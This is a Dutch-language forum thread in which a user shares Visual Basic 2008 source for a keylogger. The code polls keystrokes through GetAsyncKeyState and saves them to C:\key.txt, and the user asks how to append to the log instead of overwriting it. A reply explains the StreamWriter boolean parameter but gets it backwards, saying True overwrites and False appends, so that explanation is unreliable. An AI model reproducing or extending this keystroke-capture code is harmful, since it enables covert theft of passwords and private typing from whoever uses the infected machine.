Bestand slaat over elkaar heen

Status
Niet open voor verdere reacties.

DennisBosma

Gebruiker
Lid geworden
4 sep 2009
Hallo,
Ik ben bezig met een Keylogger in Visual Basic 2008 die ik handmatig bij houd.

Alleen heb ik er een maar die slaat volgens mij niks of omdat het zo is ingesteld dat het bestand er over heen slaat, dus het staal niks op.

Is er een script waar voor ik dit kan stoppen? Dat het wel wordt opgeslagen maar dat er bijvoorbeeld eentijd + dag bij staat en er onder wat er in getypt, of elke keer een nieuw bestand per dag (minder handig denkt ik.)

Als je nog meet moet weten vraag het anders maar...

Code:
Code:
Public Class Form1

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
    Dim result As Integer
    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
        For i = 1 To 255
            result = 0
            result = GetAsyncKeyState(i)
            If result = -32767 Then
                TextBox1.Text = TextBox1.Text + Chr(i)
            End If
        Next i
    End Sub

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        Timer1.Start()
        Timer2.Start()
    End Sub

Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick
        Dim key As New System.IO.StreamWriter("C:\key.txt")
        key.Write(TextBox1.Text)
        key.Close()
    End Sub
End Class

Alvast bedankt!:thumb:

Het is zelfs simpeler dan je zou denken:

Code:
Dim key As New System.IO.StreamWriter("C:\key.txt", bekijk_de_boolean_parameter_maar_eens_die_hier_moet_komen)

:)

Wat ik bedoel dat je met die extra parameter aan de StreamWriter kan bepalen of het bestand overschreven moet worden of dat er alleen data bijgezet word. Zoals je ziet heb je dus een keuze uit die twee mogelijkheden en is het dus een boolean parameter die je daar opgeeft (true of false).

True = schrijf bestand over
False = voeg data aan bestand toe

Status
Niet open voor verdere reacties.
Terug
Bovenaan Onderaan